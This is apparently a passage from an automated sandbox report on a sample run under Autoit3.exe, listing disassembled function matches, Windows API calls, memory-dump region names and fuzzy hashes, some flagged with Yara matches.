                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                      • Instruction ID: fbc30877c91cf7a2f73145fdd2bbf88363f54d117387895434f564bb7cd49193
                                      • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                      • Instruction Fuzzy Hash: CEE012A160561267CA34A57C7A40E9377ECEFC8751716051EF459D7282CE34E8818169
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CALL
                                      • API String ID: 0-4196123274
                                      • Opcode ID: 26b066d08d02b892a2f7c4f84367fa0e8281838baec20781bfa400909236c2ff
                                      • Instruction ID: 71a38f560a34bfc244df73313117f06fb637283de756ec2df1b50b62026ba91b
                                      • Opcode Fuzzy Hash: 26b066d08d02b892a2f7c4f84367fa0e8281838baec20781bfa400909236c2ff
                                      • Instruction Fuzzy Hash: 09325970508615DFCB64DF18C894A2AB7E1FF84304F15856DE88ADB3A2D735ECA5CB82
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: EA06
                                      • API String ID: 4104443479-3962188686
                                      • Opcode ID: bb8e987b3e89ff7fa92529f16563dacd97aff8e8250bbaeeceb4c1923d235f5d
                                      • Instruction ID: 862d1bc4d56d308824e166c01778109e307f20c9749a03f4272f56d3b663da33
                                      • Opcode Fuzzy Hash: bb8e987b3e89ff7fa92529f16563dacd97aff8e8250bbaeeceb4c1923d235f5d
                                      • Instruction Fuzzy Hash: C9418961A0426C5BDF218B589C51BFF7FADFF51310F685074EC82EB296C6218DC887A2
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000000,?,?,?,?,03CF5166,?,03CEA59B,00000000,03CEA5FE,?,00000000,00000000,00000000,00000000,00000000), ref: 03CF831A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID: GetFileAttributesA
                                      • API String ID: 3188754299-811605020
                                      • Opcode ID: 5f5bb04583afd837e0cc1862a8675ee99935cbaaa5ba2e1cdbe674b8463bb02f
                                      • Instruction ID: 572ab16c5a98aa26c86a2f27aa20c4f06d0c38d992d6c578d081c12773b2f4a0
                                      • Opcode Fuzzy Hash: 5f5bb04583afd837e0cc1862a8675ee99935cbaaa5ba2e1cdbe674b8463bb02f
                                      • Instruction Fuzzy Hash: 70F0CD34604344EFDB95EBB9CCA596DB3E8EB08320BD54878E608D62A0D770AA08E610
                                      APIs
                                      • CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?,03CF7DFA,00000000,03CF7E12,?,?,?,?,03CF5171,?,03CEA59B), ref: 03CF7D98
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID: CreateDirectoryA
                                      • API String ID: 4241100979-2169353901
                                      • Opcode ID: 06df423d2dde60eac333c5d7127977fc8cb2363dd3435e61f0f95e23b4c141f6
                                      • Instruction ID: fa42f1e06f91c22cfc5a024e6634de473f55a9f693cce5f416bdd936373ba8ee
                                      • Opcode Fuzzy Hash: 06df423d2dde60eac333c5d7127977fc8cb2363dd3435e61f0f95e23b4c141f6
                                      • Instruction Fuzzy Hash: D6F08C7A604384BFD756EBAACC62D6EB7ECEB48650BD24474F600C3200DB70AE00A620
                                      APIs
                                      • TerminateProcess.KERNELBASE(00000000,00000000,?,00000001,03CF76E2,03CEFEEC,00000000,00000000,00000002,00000000,00000000,00000000,00000002,00000000,03CF0200,00000000), ref: 03CF7C01
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID: TerminateProcess
                                      • API String ID: 560597551-2873147277
                                      • Opcode ID: d8204e1a847422ebc87caf355f2e6269d42be7f0c8643ad5edbcae399f84fcbe
                                      • Instruction ID: 388e2063468b9e54bc2ba355b2f53d0e046193661250f83a79e7228bebfdb977
                                      • Opcode Fuzzy Hash: d8204e1a847422ebc87caf355f2e6269d42be7f0c8643ad5edbcae399f84fcbe
                                      • Instruction Fuzzy Hash: 11C04CB36166206F9760A7E96C88CAB6ADCDAA91A13044461B615D3305DA644C1067B0
                                      APIs
                                        • Part of subcall function 0082593C: __FF_MSGBANNER.LIBCMT ref: 00825953
                                        • Part of subcall function 0082593C: __NMSG_WRITE.LIBCMT ref: 0082595A
                                        • Part of subcall function 0082593C: RtlAllocateHeap.NTDLL(00E90000,00000000,00000001,?,00000004,?,?,00821003,?), ref: 0082597F
                                      • std::exception::exception.LIBCMT ref: 0082101C
                                      • __CxxThrowException@8.LIBCMT ref: 00821031
                                        • Part of subcall function 008287CB: RaiseException.KERNEL32(?,?,?,008BCAF8,?,?,?,?,?,00821036,?,008BCAF8,?,00000001), ref: 00828820
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 3902256705-0
                                      • Opcode ID: 63b7841c3306f99c2d95ad87faeab53f6632baa5133a582594c9f67cf74b179b
                                      • Instruction ID: d0fc9716191ed922ff4dd2c7d265e10d17ba4971e79d35338a2858119a7cd1eb
                                      • Opcode Fuzzy Hash: 63b7841c3306f99c2d95ad87faeab53f6632baa5133a582594c9f67cf74b179b
                                      • Instruction Fuzzy Hash: 1FF06D3554462DA6CF20BA9CF91999E7BA8FF01314F240465F914D2291DFB18BC486A6
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      • Opcode ID: 79acc3896efa999176387c248a3e3da82d251e12f8669802e5d3e4076457a67d
                                      • Instruction ID: 6eba18eb69c747de671a58e699c33c3c489f0705c992b8ada014abaacb5a8b0b
                                      • Opcode Fuzzy Hash: 79acc3896efa999176387c248a3e3da82d251e12f8669802e5d3e4076457a67d
                                      • Instruction Fuzzy Hash: 76018471C41A29EBCF11AF6DAC0189F7B61FF80360F144125B824EB1A1DB758AA1DF92
                                      APIs
                                        • Part of subcall function 00828D58: __getptd_noexit.LIBCMT ref: 00828D58
                                      • __lock_file.LIBCMT ref: 0082560B
                                        • Part of subcall function 00826E3E: __lock.LIBCMT ref: 00826E61
                                      • __fclose_nolock.LIBCMT ref: 00825616
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      • Opcode ID: 82e580667f8853eb41fa16d9f506ed90c03a14ac2f3e6d76519521243de3fa98
                                      • Instruction ID: 03099f358fff9b44d4314b38b5e41ecd0184bd03fb2ad172be1c197f2c47df5a
                                      • Opcode Fuzzy Hash: 82e580667f8853eb41fa16d9f506ed90c03a14ac2f3e6d76519521243de3fa98
                                      • Instruction Fuzzy Hash: 63F09071842B25EBDB116B6DA90276E67E1FF51334F218209A428EB1C1CB7C49C19B52
                                      APIs
                                      • __lock_file.LIBCMT ref: 00825EB4
                                      • __ftell_nolock.LIBCMT ref: 00825EBF
                                        • Part of subcall function 00828D58: __getptd_noexit.LIBCMT ref: 00828D58
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2999321469-0
                                      • Opcode ID: 652f813dafcaa42618e934dab4456eae14e1a2f34135332bfdaa7d8f96ee829d
                                      • Instruction ID: ca7d774d47532ef7899b61b021c4363f2c3e6be07c1abd1389c0c0ddb9dba301
                                      • Opcode Fuzzy Hash: 652f813dafcaa42618e934dab4456eae14e1a2f34135332bfdaa7d8f96ee829d
                                      • Instruction Fuzzy Hash: CDF082759526359ADB00BB6CA90376E7690FF11331F624205A020EB1C2CF784A819A56
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000001,?,?,?,03CC195B), ref: 03CC15F7
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,03CC195B), ref: 03CC161E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: a16a4071967251907a58352cacd20368cc2259d429a1e3d20d1b858e4c65edba
                                      • Instruction ID: 4e07578e8f388aae94725d538720bed7fee1508992a3509736ea116df3b54dbb
                                      • Opcode Fuzzy Hash: a16a4071967251907a58352cacd20368cc2259d429a1e3d20d1b858e4c65edba
                                      • Instruction Fuzzy Hash: 18F0AE76F2077017D720E66B4C80F565589DF45794F1D01B5F94CEF3CAD6618C019294
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,011CFF50), ref: 011CFBEC
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,011CFF50), ref: 011CFC13
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 03457142e48081e7e8e57ad920f5f623081f965a685a9453fd24243ed60eceb8
                                      • Instruction ID: b1e00eed13521c721625da7e9bd1d915f91479078eaec12a5b9cba0142545391
                                      • Opcode Fuzzy Hash: 03457142e48081e7e8e57ad920f5f623081f965a685a9453fd24243ed60eceb8
                                      • Instruction Fuzzy Hash: 0AF02E72B0062327EF25596D4C80F9359969F65F54F154074FA48FF3CDD7514C0242A2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: f4699ce73407f7e6fd3687af13ccdbd9752f29efe32c18429d5fbff781bcfb53
                                      • Instruction ID: c21d62cf4e48b90060978a990a2471b13dbdf9f00dcecc09549487d3b5a12e5c
                                      • Opcode Fuzzy Hash: f4699ce73407f7e6fd3687af13ccdbd9752f29efe32c18429d5fbff781bcfb53
                                      • Instruction Fuzzy Hash: F331D079204A16EFD724DF18D080AA1F7A8FF18310B54C569E88ACB791DB30ECC1CB98
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: EnumWindows
                                      • String ID:
                                      • API String ID: 1129996299-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: e212778c842dc8e9747a5673df3247dd7e7e7983028b10d479db4f026e6af61e
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: E33104B8A00119DFC718DF48E480969F7A6FF59310B658AA5E409CB262EB31EDC1CF90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 50276330fbcbafc95e58a9c451b0689f70445a4841c39bb6e2e2ea161b274127
                                      • Instruction ID: 8ca3fbd0777c8372a61f253627ce1f794ba52b0f0a3b2f4e62b7c28fb543e329
                                      • Opcode Fuzzy Hash: 50276330fbcbafc95e58a9c451b0689f70445a4841c39bb6e2e2ea161b274127
                                      • Instruction Fuzzy Hash: 9C412974504351DFDB64DF18C844B1ABBE1FF84308F1988ACE8899B3A2D371E895CB92
                                      APIs
                                        • Part of subcall function 00814B29: FreeLibrary.KERNEL32(00000000,?), ref: 00814B63
                                        • Part of subcall function 0082547B: __wfsopen.LIBCMT ref: 00825486
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,008127AF,?,00000001), ref: 008149F4
                                        • Part of subcall function 00814ADE: FreeLibrary.KERNEL32(00000000), ref: 00814B18
                                        • Part of subcall function 008148B0: _memmove.LIBCMT ref: 008148FA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load__wfsopen_memmove
                                      • String ID:
                                      • API String ID: 1396898556-0
                                      • Opcode ID: 68d00873809a86b75da363678ae2c20dac604911f300a466fa22a5a0137f856c
                                      • Instruction ID: 3c2f7767b5087e833397b8df695ed52478d730ad0956dc897f36ff19346b3df1
                                      • Opcode Fuzzy Hash: 68d00873809a86b75da363678ae2c20dac604911f300a466fa22a5a0137f856c
                                      • Instruction Fuzzy Hash: D3112732650219ABCB10FB78CC02FEE77ADFF40711F108429F545E61C1EB719A84AB96
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 651816802ff46c58bec8edf7bebcf9791807305af05deee12c155c6a798f4e66
                                      • Instruction ID: c89e9dd5895700d55ca5d78b5e9d513b88c111701251e12ccfaa35266569e5b1
                                      • Opcode Fuzzy Hash: 651816802ff46c58bec8edf7bebcf9791807305af05deee12c155c6a798f4e66
                                      • Instruction Fuzzy Hash: A72113B4508755DFDB54DF14C844B1ABBE4FF88304F094968F88A973A2D731E869CB92
                                      APIs
                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 03CF5292
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 19e1dc115acc8fabefa7451324c292d227cc4c774d14a0dc89b481fe50c12d91
                                      • Instruction ID: 882017256a9ca970430eb1872f2239c568143fbb3f0cff656d4ea0fba8174312
                                      • Opcode Fuzzy Hash: 19e1dc115acc8fabefa7451324c292d227cc4c774d14a0dc89b481fe50c12d91
                                      • Instruction Fuzzy Hash: A311527AE1025C6BCB15EAD5CC81EEEB3BCAF48311F0545AAEB14DB240D6709A449BA0
                                      APIs
                                      • LoadStringA.USER32(00000000,00010000,?,00001000), ref: 011D34FB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID:
                                      • API String ID: 2948472770-0
                                      • Opcode ID: 5cf62204559087ab60950614ec390625303e3f9792decb59be4d88d8f3b843f4
                                      • Instruction ID: 856806ccbc4eff0edc37bb0fe3f785ded9791525a9f85efe6baf1b396ec6cd62
                                      • Opcode Fuzzy Hash: 5cf62204559087ab60950614ec390625303e3f9792decb59be4d88d8f3b843f4
                                      • Instruction Fuzzy Hash: 36F0A0B17001129BCB09DA9CCCC0F8673DC5F1C248B448061B518CB348EB70CC4087A2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _fseek
                                      • String ID:
                                      • API String ID: 2937370855-0
                                      • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                      • Instruction ID: a26c98ad9fc1add42c6eddb743613e8dfc06ced07fefc45620ef31aea87747b2
                                      • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                      • Instruction Fuzzy Hash: B3F085B6400218BFDF108F85EC00CEBBF7DFF89324F104198F9049A210D272EA618BA0
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,008127AF,?,00000001), ref: 00814A63
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 9898b7b15a0061ccc533bafdd3fef6128508d7783733cff3645151f605fca0a0
                                      • Instruction ID: 848aeab49c66527d83f30557ef30843e25a1559223140e8081313512a9676d16
                                      • Opcode Fuzzy Hash: 9898b7b15a0061ccc533bafdd3fef6128508d7783733cff3645151f605fca0a0
                                      • Instruction Fuzzy Hash: F4F0F271185721CFCB349F64E4A4896BBF9FF1432A329A92EE1E6C2610C7319984DB44
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                      • Instruction ID: 79f824e42ff38cb356cadced68eef0bc15b8c5403ef6cc64e6792a875b03ef30
                                      • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                      • Instruction Fuzzy Hash: AFF0F87640020DFFDF05CF94C941EAABB79FF14314F208589FD198A252D376DA61AB91
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00800000,?,00000105), ref: 03CC59AE
                                        • Part of subcall function 03CC5C24: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03CC5C3F
                                        • Part of subcall function 03CC5C24: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5C5D
                                        • Part of subcall function 03CC5C24: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5C7B
                                        • Part of subcall function 03CC5C24: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03CC5C99
                                        • Part of subcall function 03CC5C24: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03CC5D28,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03CC5CE2
